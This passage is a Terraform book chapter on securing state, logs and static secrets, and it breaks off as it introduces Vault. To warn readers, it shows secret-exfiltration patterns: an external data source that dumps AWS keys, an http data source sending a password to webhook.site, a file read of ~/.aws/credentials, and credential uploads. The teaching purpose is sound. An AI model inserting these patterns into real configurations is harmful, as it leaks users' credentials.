13 Security and secrets management

This chapter covers

  • Securing state and log files
  • Managing static and dynamic secrets
  • Enforcing “policy as code” with Sentinel

On July 25, 2019, the Democratic Senatorial Campaign Committee (DSCC) was discovered to have exposed over 6.2 million email addresses. It was one of the largest data breaches of all time. The vast majority of exposed email addresses belonged to average Americans, although thousands of university, government, and military personnel’s emails were leaked as well. The root cause of the incident was a publicly accessible S3 bucket. Anyone with an Amazon Web Services (AWS) account could access the emails stored in a spreadsheet named EmailExcludeClinton.csv. At the time of the discovery, the data had been exposed for at least nine years, based on the last-modified date of 2010.

This homily should serve as a warning to those who fail to take information security seriously. Data breaches are enormously detrimental, not only to the public but to corporations as well. Loss of brand reputation, loss of revenue, and government-imposed fines are just some of the potential consequences. Vigilance is required because all it takes for a data breach to occur is a slight oversight, such as an improperly configured S3 bucket that hasn’t been used for years.

Security is everybody’s responsibility. But as a Terraform developer, your share of the responsibility is greater than most. Terraform is an infrastructure provisioning technology and therefore handles a lot of secrets—more than most people realize. Secrets like database passwords, personal identification information (PII), and encryption keys may all be consumed and managed by Terraform. Worse, many of these secrets appear as plaintext, either in Terraform state or in log files. Knowing how and where secrets have the potential to be leaked is critical to developing an effective counter-strategy. You have to think like a hacker to protect yourself from a hacker.

Secrets management is about keeping your secret information secret. Best practices for secrets management with Terraform, as we discuss in this chapter, include the following:

  • Securing state files

  • Securing logs

  • Managing static secrets

  • Dynamic just-in-time secrets

  • Enforcing “policy as code” with Sentinel

13.1 Securing Terraform state

Sensitive information will inevitably find its way into Terraform state pretty much no matter what you do. Terraform is fundamentally a state-management tool, so to perform basic execution tasks like drift detection, it needs to compare previous state with current state. Terraform does not treat attributes containing sensitive data any differently than it treats non-sensitive attributes. Therefore, any and all sensitive data is put in the state file, which is stored as plaintext JSON. Because you can’t prevent secrets from making their way into Terraform state, it’s imperative that you treat the state file as sensitive and secure it accordingly. In this section, we discuss three methods for securing state files:

  • Removing unnecessary secrets from Terraform state

  • Least-privileged access control

  • Encryption at rest

13.1.1 Removing unnecessary secrets from Terraform state

Although you ultimately cannot avoid secrets from wheedling their way into Terraform state, there’s no excuse for complacency. You should never expose more sensitive information than is absolutely required. If the worst were to happen and, despite your best efforts and safety precautions, the contents of your state file were to be leaked, it is better to expose one secret than a dozen (or a hundred).

Tip Fewer secrets means you have less to lose in the event of a data breach.

To minimize the number of secrets stored in Terraform state, you first have to know what can be stored in Terraform state. Fortunately, it’s not a long list. Only three configuration blocks can store stateful information (sensitive or otherwise) in Terraform: resources, data sources, and output values. Other kinds of configuration blocks (providers, input variables, local values, modules, etc.) do not store stateful data. Any of these other blocks may leak sensitive information in other ways, but at least you do not need to worry about them saving sensitive information to the state file.

Now that you know which blocks have the potential to store sensitive information in Terraform, you have to determine which secrets are necessary and which are not. Much of this depends on the level of risk you are willing to accept and the kinds of resources you are managing with Terraform. An example of a necessary secret is shown next. This code declares a Relational Database Service (RDS) database instance and passes in two secrets: var.username and var.password. Since both of these attributes are defined as required, if you want Terraform to provision an RDS database, you must be willing to accept that your master username and password secret values exist in Terraform state:

resource "aws_db_instance" "database" {
  allocated_storage    = 20
  engine               = "postgres"
  engine_version       = "9.5"
  instance_class       = "db.t3.medium"
  name                 = "ptfe"
  username             = var.username           
  password             = var.password           
}

username and password are attributes of the aws_db_instance resource. These are necessary secrets because it is impossible to provision this resource without storing the values in Terraform state.

Note Defining your variables as sensitive does not prevent them from being stored in Terraform state.

The following listing shows Terraform state for a deployed RDS instance. Notice that username and password appear in plaintext.

Listing 13.1 aws_db_instance in Terraform state

{
    "mode": "managed",
    "type": "aws_db_instance",
    "name": "database",
    "provider": "provider.aws",
    "instances": [
      {
        "schema_version": 1,
        "attributes": {
         //not all attributes are shown 
          "password": "hunter2",                                  
          "performance_insights_enabled": false,
          "performance_insights_kms_key_id": "",
          "performance_insights_retention_period": 0,
          "port": 5432,
          "publicly_accessible": false,
          "replicas": [],
          "replicate_source_db": "",
          "resource_id": "db-O6TUYBMS2HGAY7GKSLTL5H4JEM",
          "s3_import": [],
          "security_group_names": null,
          "skip_final_snapshot": false,
          "snapshot_identifier": null,
          "status": "available",
          "storage_encrypted": false,
          "storage_type": "gp2",
          "tags": null,
          "timeouts": null,
          "timezone": "",
          "username": "admin"                                     
        }
      }
    ]
}

username and password appear as plaintext in Terraform state.

username and password appear as plaintext in Terraform state.

Setting secrets on a database instance may be unavoidable, but there are plenty of avoidable situations. For example, you should never pass the RDS database username and password to a lambda function as environment variables. Consider the following code, which declares an aws_lamba_function resource that has username and password set as environment variables.

Listing 13.2 Lambda function configuration code

resource "aws_lambda_function" "lambda" {
  filename      = "code.zip"
  function_name = "${local.namespace}-lambda"
  role          = aws_iam_role.lambda.arn
  handler       = "exports.main"
 
  source_code_hash = filebase64sha256("code.zip")
  runtime = "nodejs12.x"
 
  environment {
    variables = {
      USERNAME = var.username      
      PASSWORD = var.password      
    }
  }
}

RDS database username and password set as environment variables

Since the environment block of aws_lambda_function contains these values, they will be stored in state just as they were for the database. The difference is that while the RDS database required username and password to be set, the AWS Lambda function does not. The Lambda function only needs credentials to connect to the database instance at runtime.

You might think this is excessive and possibly redundant. After all, if you are declaring the RDS instance in the same configuration code as your AWS Lambda function, wouldn’t the sensitive information be stored in Terraform state regardless? And you would be right. But you would also be exposing yourself to additional vulnerabilities outside of Terraform. If you aren’t familiar with AWS Lambda, environment variables on Lambda functions are exposed to anyone with read access to that resource (see figure 13.1).

CH13_F01_Winkler

Figure 13.1 Environment variables for AWS Lambda functions are visible to anyone with read access in the console. Avoid setting secrets as environment variables in AWS Lambda whenever possible.

Granted, people with read access to your AWS account tend to be coworkers and trusted contractors, but do you really want to risk exposing sensitive information that way? I recommend adopting a zero-trust policy, even within your team. A better solution would be to read secrets dynamically from a centralized secrets store.

We can remove USERNAME and PASSWORD from the environment block by replacing them with a key that tells AWS Lambda where to find the secrets, such as AWS Secrets Manager. AWS Secrets Manager is a secret store not unlike Vault (Azure and Google Cloud Platform [GCP] have equivalents). To use AWS Secrets Manager, we will need to give permissions to Lambda to read from Secrets Manager and add a few lines of boilerplate to the Lambda source code. This will prevent secrets from showing up in the state file and prevent other avenues of sensitive information leakage, such as through the AWS console.

Why not RDS Proxy?

RDS Proxy is a managed service that allows proxy targets to pool database connections. It’s currently the best way to connect AWS Lambda to RDS. However, since this service uses AWS Secrets Manager under the hood, and since it’s not a generalized solution that can work with any kind of secret, we will not use it in this chapter.

The following listing shows aws_lambda_function refactored to use a SECRET_ID pointing to a secret stored in AWS Secrets Manager.

Listing 13.3 Lambda function configuration code

resource "aws_lambda_function" "lambda" {
  filename      = "code.zip"
  function_name = "${local.namespace}-lambda"
  role          = aws_iam_role.lambda.arn
  handler       = "exports.main"
 
  source_code_hash = filebase64sha256("code.zip")
  runtime = "nodejs12.x"
 
  environment {
    variables = {
      SECRET_ID = var.secret_id           
    }
  }
}

No more secrets in the configuration code! This is an ID for where to fetch the secrets.

Now, in the application source code, SECRET_ID can be used to fetch the secret at runtime (see listing 13.4).

Note For this to work, AWS Lambda needs to be given permission to fetch the secret value from AWS Secrets Manager.

Listing 13.4 Lambda function source code

package main
 
import (
    "context"
    "fmt"
    "os"
 
    "github.com/aws/aws-lambda-go/lambda"
    "github.com/aws/aws-sdk-go/aws"

    "github.com/aws/aws-sdk-go/aws/session"
    "github.com/aws/aws-sdk-go/service/secretsmanager"
)

func HandleRequest(ctx context.Context) error {
    client := secretsmanager.New(session.New())
    config := &secretsmanager.GetSecretValueInput{
        SecretId: aws.String(os.Getenv("SECRET_ID")),
    }
    val, err := client.GetSecretValue(config)             
    if err != nil {
        return err
    }
 
    // do something with secret value
    fmt.Printf("Secret is: %s", *val.SecretString)
 
    return nil
}
 
func main() {
    lambda.Start(HandleRequest)
}

Fetches the secret dynamically by ID

We formally introduce AWS Secrets Manager later when we talk about managing dynamic secrets in Terraform.

13.1.2 Least-privileged access control

Removing unnecessary secrets is always a good idea, but it won’t prevent your state file from being exposed in the first place. To do that, you need to treat the state file as secret and gate who has access to it. After all, you don’t want just anyone accessing your state file. Users should only be able to access state files that they need access to. In general, a principle of least privilege should be upheld, meaning users and service accounts should have only the minimal privileges required to do their jobs.

In chapter 6, we did exactly this when we created a module for deploying an S3 backend. As part of this module, we restricted access to the S3 bucket to just the account that required access to it. The S3 bucket holds the state files, and although we want to give read/write access to some state files, we may not want to give that access to all users. The next listing shows an example of the policy we created for enabling least-privileged access.

Listing 13.5 IAM least-privileged policy for the S3 backend

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "",
            "Effect": "Allow",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::tia-state-bucket"
        },
        {
            "Sid": "",
            "Effect": "Allow",
            "Action": [
                "s3:PutObject",
                "s3:GetObject"
            ],
            "Resource": "arn:aws:s3:::tia-state-bucket/team1/*"     
        },
        {
            "Sid": "",
            "Effect": "Allow",
            "Action": [
                "dynamodb:PutItem",
                "dynamodb:GetItem",
                "dynamodb:DeleteItem"
            ],
            "Resource": 
                "arn:aws:dynamodb:us-west-2:215974853022:table/tia-state-lock"
        }
    ]
}

This could be further restricted with a bucket prefix if desired.

Terraform Cloud and Terraform Enterprise allow you to restrict user access to state files with team access settings. The basic idea is that users are added to teams, and the teams grant read/write/admin access to specific workspaces and their associated state files. People who are not on an authorized team will be unable to read the state file. For more information about how teams and team access work, refer to the official HashiCorp documentation (http://mng.bz/0r4p).

TIP In addition to securing state files, you can create least-privileged deployment roles for users and service accounts. We did this in chapter 12 with the helloworld.json policy.

13.1.3 Encryption at rest

Encryption at rest is the act of translating data into a format that cannot be decrypted except by authorized users (see figure 13.2). Even if a malicious user were to gain physical access to the machines storing encrypted data, the data would be useless to them.

CH13_F02_Winkler

Figure 13.2 Data must be encrypted every step of the way. Most Terraform backends take care of data in transit, but you are responsible for ensuring that data is encrypted at rest.

What about encryption in transit?

Encrypting data in transit is just as important as encrypting data at rest. Encrypting data in transit means protecting against network traffic eavesdropping. The standard way to do this is to ensure that data is exclusively transmitted over SSL/TLS, which is enabled by default for most backends including S3, Terraform Cloud, and Terraform Enterprise. This isn’t true for some backends, such as the HTTP backend, which is why you should avoid using it. No matter what backend you choose, it’s your responsibility to ensure that data is protected both at rest and in transit.

Encryption at rest is easy to enable for most backends. If you are using an S3 backend like the one we created in chapter 6, you can specify a Key Management Service (KMS) key to use client-side encryption or just let S3 use a default encryption key for server-side encryption. If you are using Terraform Cloud or Terraform Enterprise, your data is automatically encrypted at rest by default. In fact, it’s double encrypted: once with KMS and again with Vault. For other remote backends, you will need to consult the documentation to learn how to enable encryption at rest.

Why not scrub secrets from Terraform state?

There has been much discussion in the community of scrubbing (removing) secrets from Terraform before they are stored in Terraform state. One experiment that has been tried lets users provide a PGP key to encrypt sensitive information before it is stored in the state file. This method has been deprecated in newer versions of Terraform, primarily because it is hard for Terraform to interpolate values that are not stored in plaintext. Also, if the PGP key were to be lost (which happens more often than you think), your state file would be as good as gone. Nowadays, using a remote backend with encryption at rest is the recommended approach.

13.2 Securing logs

Insecure log files pose an enormous security risk—but, surprisingly, many people aren’t aware of the danger. By reading Terraform log files, malicious users can glean sensitive information about your deployment, such as credentials and environment variables, and use them against you (see figure 13.3). In this section, we discuss how sensitive information can be leaked through insecure log files and what you can do to prevent it.

CH13_F03_Winkler

Figure 13.3 A malicious user can steal credentials from log files to make unauthorized API calls to AWS.

13.2.1 What sensitive information?

People are often shocked to learn that sensitive information appears in log files. The official documentation and online blog articles focus on the importance of securing the state file, but little is said about the importance of securing logs. Let’s look at an example of how secrets can be leaked in logs. Consider the following configuration code snippet, which declares a simple “Hello World!” EC2 instance:

resource "aws_instance" "helloworld" {
    ami = var.ami_id
    instance_type = "t2.micro"
    tags = {
      Name = "HelloWorld"
    }
}

If you were to create this resource without enabling trace logging, the logs would be short and relatively uninteresting:

$ terraform apply -auto-approve
aws_instance.helloworld: Creating...
aws_instance.helloworld: Still creating... [10s elapsed]
aws_instance.helloworld: Still creating... [20s elapsed]
aws_instance.helloworld: Creation complete after 24s [id=i-002030c2b40edd6bb]
 
Apply complete! Resources: 1 added, 0 changed, 0 destroyed.

On the other hand, if you were to run the same configuration code with trace logs enabled (TF_LOG=trace), you would find information in the logs about the current caller identity, temporary signed access credentials, and response data from all requests made to deploy the EC2 instance. The following listing shows an excerpt.

Listing 13.6 sts:GetCallerIdentity in trace level logs

Trying to get account information via sts:GetCallerIdentity
[aws-sdk-go] DEBUG: Request sts/GetCallerIdentity Details:
---[ REQUEST POST-SIGN ]-----------------------------
POST / HTTP/1.1
Host: sts.amazonaws.com
User-Agent: aws-sdk-go/1.30.16 (go1.13.7; darwin; amd64) APN/1.0 
HashiCorp/1.0 Terraform/0.12.24 (+https://www.terraform.io)
Content-Length: 43
Authorization: AWS4-HMAC-SHA256   
Credential=AKIATESI2XGPMMVVB7XL/20200504/us-east-1/sts/aws4_request,        B
SignedHeaders=content-length;content-type;host;x-amz-date,                 
Signature=c4df301a200eb46d278ce1b6b9ead1cfbe64f045caf9934a14e9b7f8c207c3f8 
Content-Type: application/x-www-form-urlencoded; charset=utf-8
X-Amz-Date: 20200504T084221Z
Accept-Encoding: gzip
Action=GetCallerIdentity&Version=2011-06-15
-----------------------------------------------------
[aws-sdk-go] DEBUG: Response sts/GetCallerIdentity Details:
---[ RESPONSE ]--------------------------------------
HTTP/1.1 200 OK
Connection: close
Content-Length: 405
Content-Type: text/xml
Date: Mon, 04 May 2020 07:37:21 GMT
X-Amzn-Requestid: 74b2886b-43bc-475c-bda3-846123059142
-----------------------------------------------------
[aws-sdk-go] <GetCallerIdentityResponse xmlns="https://sts.amazonaws.com/doc/2011-06-15/">
  <GetCallerIdentityResult>
    <Arn>arn:aws:iam::215974853022:user/swinkler</Arn>                     
    <UserId>AIDAJKZ3K7CTQHZ5F4F52</UserId>                                 
    <Account>215974853022</Account>                                        
  </GetCallerIdentityResult>
  <ResponseMetadata>
    <RequestId>74b2886b-43bc-475c-bda3-846123059142</RequestId>
  </ResponseMetadata>
</GetCallerIdentityResponse>

Temporary signed credentials that can be used to make a request on your behalf

Information about the current caller identity

The temporary signed credentials that appear in the trace logs can be used to make authorized API requests (at least until they expire, which is in about 15 minutes).

The next listing demonstrates using the previous credentials to make a curl request and the response from the server.

Listing 13.7 Invoking sts:GetCallerIdentity with signed credentials

$ curl -L -X POST 'https://sts.amazonaws.com' 
-H 'Host: sts.amazonaws.com' 
AWS4-HMAC-SHA256 
Credential=AKIATESI2XGPMMVVB7XL/20200504/us-east-1/sts/aws4_request, 
SignedHeaders=content-length;content-type;host;x-amz-date, 
Signature=c4df301a200eb46d278ce1b6b9ead1cfbe64f045caf9934a14e9b7f8c207c3f8' 

-H 'Content-Type: application/x-www-form-urlencoded; charset=utf-8' 
20200504T084221Z' 
-H 'Accept-Encoding: gzip' 
--data-urlencode 'Action=GetCallerIdentity' 
--data-urlencode 'Version=2011-06-15'
 
<GetCallerIdentityResponse xmlns="https://sts.amazonaws.com/doc/2011-06-15/">
  <GetCallerIdentityResult>
    <Arn>arn:aws:iam::215974853022:user/swinkler</Arn>
    <UserId>AIDAJKZ3K7CTQHZ5F4F52</UserId>
    <Account>215974853022</Account>
  </GetCallerIdentityResult>
  <ResponseMetadata>
    <RequestId>e6870ff6-a09e-4479-8860-c3ca08b323b5</RequestId>
  </ResponseMetadata>
</GetCallerIdentityResponse>

I know what you might be thinking: what if someone gets access to invoke sts:GetCallerIdentity? Keeping it a secret is not that important—but sts:GetCallerIdentity is just the beginning! Every API call that Terraform makes to AWS will appear in the trace logs along with the complete request and response objects. That means for the “Hello World!” deployment, signed credentials allowing someone to invoke ec2:CreateInstance and vpc:DescribeVpcs appear as well. Granted, these are temporary credentials that expire in 15 minutes, but risks are risks!

TIP Always turn off trace logging except when debugging.

13.2.2 Dangers of local-exec provisioners

In chapter 7, we introduced local-exec provisioners and how they can be used to execute commands on a local machine during terraform apply and terraform destroy. As previously mentioned, local-exec provisioners are inherently dangerous and should be avoided whenever possible. Now I will give you one more reason to be wary of them: even when trace logging is disabled, local-exec provisioners can be used to print secrets in the log files.

Consider this snippet, which declares a null_resource with an attached local-exec provisioner:

resource "null_resource" "uh_oh" {
  provisioner "local-exec" {
    command = <<-EOF
        echo "access_key=$AWS_ACCESS_KEY_ID"
        echo "secret_key=$AWS_SECRET_ACCESS_KEY"
    EOF
    }
}

If you ran this, you would see the following during terraform apply (even when trace logging is disabled):

$ terraform apply -auto-approve
null_resource.uh_oh: Creating...
null_resource.uh_oh: Provisioning with 'local-exec'...
null_resource.uh_oh (local-exec): Executing: ["/bin/sh" "-c" "echo 
"access_key=$AWS_ACCESS_KEY_ID"
echo 
"secret_key=$AWS_SECRET_ACCESS_KEY"
"]
null_resource.uh_oh (local-exec): access_key=ASIAQHUM6YXTDSEUEMUJ          
null_resource.uh_oh (local-exec):                                          
secret_key=ILjkhTbflyPdxkvWJl9NV8qZXPJ+yVM3JSq3Uaz1                        
null_resource.uh_oh: Creation complete after 0s [id=5973892021553480485]
 
Apply complete! Resources: 1 added, 0 changed, 0 destroyed.

AWS access key

AWS secret access key

Note AWS access keys are not the only things local-exec provisioners can expose. Any secret stored on the machine running Terraform is at risk.

13.2.3 Dangers of external data sources

Somewhat related to local-exec provisioners are external data sources. In case you aren’t aware of these dodgy characters, external data sources allow you to execute arbitrary code and return the results to Terraform. That sounds great at first because you can create custom data sources without resorting to writing your own Terraform provider. The downside is that any arbitrary code can be called, which can be extremely troublesome if you are not careful (see figure 13.4).

CH13_F04_Winkler

Figure 13.4 External data sources execute arbitrary code (such as Python, JavaScript, Bash, etc.) and return the results to Terraform. If the code is malicious, it can cause all sorts of problems before you have a chance to do anything about it.

TIP If you are interested in creating custom resources without writing your own provider, I recommend using the Shell provider for Terraform (https://github.com/scottwinkler/terraform-provider-shell; see appendix D).

External data sources are particularly nefarious because they run during terraform plan, which means all a malicious user would need to do to gain access to all your secrets is sneak this code into your configuration and make sure terraform plan is run. No apply is required.

TIP Always skim through any module you want to use, even if it comes from the official module registry, to ensure that no malicious code is present.

Consider this code, which doesn’t look that bad at first glance:

data "external" "do_bad_stuff" {
  program = ["node", "${path.module}/run.js"]
}

During terraform plan, this data source could run a Node.js script to execute malicious code. Here’s an example of what the external script might do:

// runKeyLogger()
// stealBankingInformation()
// emailNigerianPrince()
console.log(JSON.stringify({
    AWS_ACCESS_KEY_ID: process.env.AWS_ACCESS_KEY_ID,
    AWS_SECRET_ACCESS_KEY: process.env.AWS_SECRET_ACCESS_KEY,
}))

When this code runs, it can do anything from installing viruses to stealing your private data to mining bitcoins. In this example, the code just returns a JSON object with the AWS access and secret access keys in tow (which is still nasty!). If you were to run this, nothing of interest would show up in the logs:

$ terraform apply -auto-approve
data.external.do_bad_stuff: Refreshing state...
 
Apply complete! Resources: 0 added, 0 changed, 0 destroyed.

But in your state file, the data would appear in plaintext:

$ terraform state show data.external.do_bad_stuff
# data.external.do_bad_stuff:
data "external" "do_bad_stuff" {
    id      = "-"
    program = [
        "node",
        "./run.js",
    ]
    result  = {
       "AWS_ACCESS_KEY_ID" = "ASIAQHUM6YXTDSEUEMUJ"
       "AWS_SECRET_ACCESS_KEY" = "ILjkhTbflyPdxkvWJl9NV8qZXPJ+yVM3JSq3Uaz1"
    }
} 

That’s not the end of it. The sensitive information could also appear in the logs, if trace logging were enabled:

JSON output: [123 34 65 87 83 95 65 67 67 69 83 83 95 75 69 89 95 73 68 34 
58 34 65 83 73 65 81 72 85 77 54 89 88 84 68 83 69 85 69 77 85 74 34 44 34 
65 87 83 95 83 69 67 82 69 84 95 65 67 67 69 83 83 95 75 69 89 34 58 34 73 
76 106 107 104 84 98 102 108 121 80 100 120 107 118 87 74 108 57 78 86 56 
113 90 88 80 74 43 121 86 77 51 74 83 113 51 85 97 122 49 34 125 10]

Converting this byte array to a string yields the following JSON string:

{
    "AWS_ACCESS_KEY_ID": "ASIAQHUM6YXTDSEUEMUJ",
    "AWS_SECRET_ACCESS_KEY": "ILjkhTbflyPdxkvWJl9NV8qZXPJ+yVM3JSq3Uaz1"
}

Note External data sources are perhaps the most dangerous resources in all of Terraform. Be extremely judicious with their use, as there are many clever and devious ways that sensitive information could be leaked with them.

13.2.4 Dangers of the HTTP provider

The HTTP provider is a utility provider for interacting with generic HTTP servers as part of Terraform configuration. It exposes a single http_http data source that makes a GET request to a given URL and exports information about the response. This data source is meant to merely fetch data, but it could easily be abused to steal sensitive information, much like the external data source. For example, you could do a GET request with a query string parameter to redirect sensitive information. Effectively, whoever owns the API will get their hands on your sensitive information whenever terraform plan is run:

variable "password" {
  type      = string
  sensitive = true
  default   = "hunter2"
}
 
data "http" "password" {
  url = "https://webhook.site/440255d9?pw=${var.password}"     
 
  request_headers = {
    Accept = "application/json"
  }
}

Performs a GET with your password against a custom API

13.2.5 Restricting access to logs

Many of the same rules for securing state files also apply to log files: you don’t want people reading log files if it’s not required to do their job, and you want to encrypt data at rest and in transit so there is no possibility of hackers or eavesdroppers gaining access to your data. Here are some additional guidelines specific to securing log files:

  • Do not allow unauthorized users to run plan or apply against your workspace.

  • Turn off trace-level logging except when debugging.

  • If you have continuous integration webhooks set up on a repository, do not allow terraform plan to be run from pull requests (PRs) initiated from forks. This would allow hackers to run external or HTTP data sources even without you having merged a PR.

TIP Relax, I’m not trying to scare you. Not many people know about these exploits, and of the few who do, probably none have reason to cause you harm. Use your best judgment, and don’t take any unnecessary risks.

13.3 Managing static secrets

Static secrets are sensitive values that do not change, or at least do not change often. Most secrets can be classified as static secrets. Things like username and passwords, long-lived oAuth tokens, and config files containing credentials are all examples of static secrets. In this section, we discuss some of the different ways to manage static secrets as well as an overview of how to effectively rotate static secrets.

13.3.1 Environment variables

There are two major ways to pass static secrets into Terraform: as environment variables and as Terraform variables. I recommend passing secrets as environment variables whenever possible because it is far safer than the alternative. Environment variables do not show up in the state or plan files, and it’s harder for malicious users to access your sensitive values as compared to Terraform variables. In the previous section, we discussed how environment variables could be leaked with local-exec provisioners, external data sources, and the HTTP provider, but these risks can be mitigated with careful code reviews or Sentinel policies (as we will see in section 13.5).

As safe as environment variables tend to be, with few exceptions they can only configure secrets in Terraform providers. Some rare resources have the ability to read variables from the environment as well, and you will know if you come across one.

Note As discussed in chapter 12, it’s possible to set Terraform variables with environment variables, but this does not help from a security point of view.

When configuring a Terraform provider, you definitely do not want to pass sensitive information as regular Terraform variables:

provider "aws" {
  region     = "us-west-2"
  access_key = var.access_key      
  secret_key = var.secret_key      
}

A very bad idea!

Configuring sensitive information in providers with Terraform variables is inherently dangerous because it opens you up to the possibility of someone redirecting secrets and using them elsewhere. Consider how easy it is for someone to output the AWS access and secret access keys simply by adding the following lines to the configuration code:

output "aws" {
    value = {
        access_key = var.access_key,
        secret_key = var.secret_key
    }
}

Another possibility is saving the contents to a local_file resource

resource "local_file" "aws" {
  filename = "credentials.txt"
  content = <<-EOF
  access_key = ${var.access_key}
  secret_key = ${var.secret_key}
  EOF
}

or even uploading to an S3 bucket:

resource "aws_s3_bucket_object" "aws" {
  key     = "creds.txt"
  bucket  = var.bucket_name
  content = <<-EOF
  access_key = ${var.access_key}
  secret_key = ${var.secret_key}
  EOF
}

As you can see, it doesn’t take a genius to be able to read sensitive information from Terraform variables. The avenues of attack are so numerous that it’s nearly impossible to develop an effective governance strategy. Anyone with access to modify your configuration code or run plan and apply on your workspace can easily steal secret values.

The recommended approach is therefore to configure providers using environment variables:

provider "aws" {
  region = "us-west-2"     
}

The access key and secret key are set as environment variables instead of Terraform variables.

It’s worth mentioning that some providers allow you to set secret information in other ways, such as through a config file. This works fine for most use cases but can be a little awkward when running Terraform in automation. You should also be aware that nothing on your machine is truly secret, config files included. Consider the following code, which declares a local_file data source to read data from an AWS credentials file:

data "local_file" "credentials" {
    filename = "/Users/Admin/.aws/credentials"
}

I know this example is a bit contrived, and I doubt you will ever encounter this exact situation yourself, but it is something to be aware of, nonetheless. Just because a file is “hidden” on your filesystem doesn’t mean Terraform can’t access it (see figure 13.5).

CH13_F05_Winkler

Figure 13.5 No secret is safe from the prying eye of Terraform.

Warning Malicious Terraform code can access any secret stored on a local machine running Terraform!

13.3.2 Terraform variables

Despite all the shortcomings of Terraform variables, sometimes you do not have a choice in the matter. Recall the database instance we declared earlier:

resource "aws_db_instance" "database" {
  allocated_storage    = 20
  engine               = "postgres"
  engine_version       = "9.5"
  instance_class       = "db.t3.medium"
  name                 = "ptfe"
  username             = var.username           
  password             = var.password           
}

Cannot be set from environment variables

If you wish to deploy an RDS database, you are stuck setting username and password as Terraform variables, since there is no option for using environment variables. In this case, you can still use Terraform variables to set sensitive information as long as you are smart about it.

First, I recommend running Terraform in automation, if you are not already doing so. It is imperative that a single source of truth be maintained for configuration code in Terraform state. You do not want people deploying Terraform from their local machines, even if they are using a remote backend like S3. By ensuring that Terraform runs are always linked to a specific Git commit, you prevent troublemakers from inserting malicious code without leaving behind incriminating evidence in the Git history.

After running Terraform in automation, you should seek to isolate sensitive Terraform variables from non-sensitive Terraform variables. Terraform Cloud and Terraform Enterprise make this easy because they let you mark variables as sensitive when creating through the UI/API. Figure 13.6 shows this in action.

CH13_F06_Winkler

Figure 13.6 Terraform variables can be marked as sensitive by clicking the Sensitive check box.

If you aren’t using Terraform Cloud or Terraform Enterprise, you will have to segregate sensitive Terraform variables yourself. One way to accomplish this is by deploying workspaces with multiple variable-definition files. Terraform does not automatically load variable-definition files with any name other than terraform.tfvars, but you can specify other files using the -var-file flag. For instance, if you have non-sensitive data stored in production.tfvars (possibly checked into Git) and sensitive data stored in secrets.tfvars (definitely not checked into Git), the following command will do the trick:

$ terraform apply 
  -var-file="secrets.tfvars" 
  -var-file="production.tfvars"

13.3.3 Redirecting sensitive Terraform variables

Sensitive variables can be defined by setting the sensitive argument to true:

variable "password" {
  type      = string
  sensitive = true
}

Variables defined as sensitive appear in Terraform state but are redacted from CLI output. Consider the following code, which declares a sensitive variable and attempts to print it out with a local-exec provisioner:

variable "password" {
  type      = string
  sensitive = true
  default   = "hunter2"
}
 
resource "null_resource" "safe" {
  provisioner "local-exec" {
    command = "echo ${var.password}"
  }
}

This code behaves as expected, with the output being suppressed from CLI output:

$ terraform apply -auto-approve
null_resource.safe: Creating...
null_resource.safe: Provisioning with 'local-exec'...
null_resource.safe (local-exec): (output suppressed due to sensitive value 
in config)
null_resource.safe (local-exec): (output suppressed due to sensitive value 
in config)
null_resource.safe: Creation complete after 0s [id=3800487680631318804]
 
Apply complete! Resources: 1 added, 0 changed, 0 destroyed.

Defining a variable as sensitive prevents users from accidently exposing secrets but does not stop motivated individuals.

Consider instead the following code, which redirects var.password to local _file before reading it back and printing it with a local-exec provisioner:

variable "password" {
  type      = string
  sensitive = true
  default   = "hunter2"
}
 
resource "local_file" "password" {                            
  filename = "password.txt"
  content  = var.password
}
 
data "local_file" "password" {
  filename = local_file.password.filename                     
}
 
resource "null_resource" "uh_oh" {
  provisioner "local-exec" {
    command = "echo ${data.local_file.password.content}"      
  }
}

Redirects a secret to a local file

Reads the secret from the local file

Prints the redirected secret

You might be surprised to learn that the sensitive value is not obfuscated in the logs:

$ terraform apply -auto-approve
local_file.password: Creating...
local_file.password: Creation complete after 0s [id=f3bbbd66a63d4bf1747940578ec3d0103530e21d]
data.local_file.password: Reading...
data.local_file.password: Read complete after 0s [id=f3bbbd66a63d4bf1747940578ec3d0103530e21d]
null_resource.uh_oh: Creating...
null_resource.uh_oh: Provisioning with 'local-exec'...
null_resource.uh_oh (local-exec): Executing: ["/bin/sh" "-c" "echo hunter2"]
null_resource.uh_oh (local-exec): hunter2 
null_resource.uh_oh: Creation complete after 0s [id=4946082416658079188]
 
Apply complete! Resources: 2 added, 0 changed, 0 destroyed.

This is because Terraform does not simply perform a find and replace to scrub secrets: it scrubs references to secrets. If you go through an intermediary, Terraform can lose track of the reference, and it will not be suppressed the way it is supposed to be.

Besides local-exec provisioners, there are many other ways to redirect sensitive variables. As mentioned before, you can upload to an S3 bucket, use an external data source, or use an HTTP data source.

TIP Despite the security limitations of sensitive variables, I recommend using them whenever possible. Using them makes it much more difficult to print variables compared to not using them.

13.4 Using dynamic secrets

Secrets should be rotated periodically: at least once every 90 days, or in response to known security threats. You don’t want people stealing secrets and using them indefinitely. The smaller the window of time during which a secret is valid, the better. Ideally, secrets should not even exist until they are needed (they should be created “just in time”) and should be revoked immediately after use. These are called dynamic secrets, and they are substantially more secure than static secrets.

We briefly mentioned dynamic secrets earlier, when we discussed the importance of removing unnecessary secrets from Terraform. That was more about moving secrets out of Terraform configuration and into the application layer. For dynamic secrets that cannot be moved into the application layer, the recommended approach is to use a data source that can read secrets from a secrets provider during Terraform execution.

Note If you are running Terraform in automation, you can also write custom logic for reading dynamic secrets—something that does not involve data sources.

In this section, we discuss how data sources from secrets providers like HashiCorp Vault and AWS Secrets Manager can be used to dynamically read secrets into Terraform variables.

13.4.1 HashiCorp Vault

HashiCorp Vault is a secrets-management solution that allows you to store, access, and distribute secrets by authenticating clients against various identity providers (see figure 13.7). It’s a great tool for managing static and dynamic secrets and is fast becoming the gold standard in the industry. Vault is HashiCorp’s biggest source of revenue, with over $100 million in revenue as of 2020.

CH13_F07_Winkler

Figure 13.7 Vault is a secrets-management tool that allows you to store, access, and distribute secrets by authenticating clients against various identity providers.

Operationalizing and deploying Vault is outside the scope of this book. We will talk about how to integrate Terraform with an existing Vault deployment to read dynamic secrets at runtime.

Vault exposes an API for creating, reading, updating, and deleting secrets. As you might expect, this also means there’s a Vault provider for Terraform that allows managing Vault resources. The Vault provider for Terraform is no different than any other Terraform provider; you declare what you want in code, and Terraform takes care of making the backend API calls on your behalf (see figure 13.8).

CH13_F08_Winkler

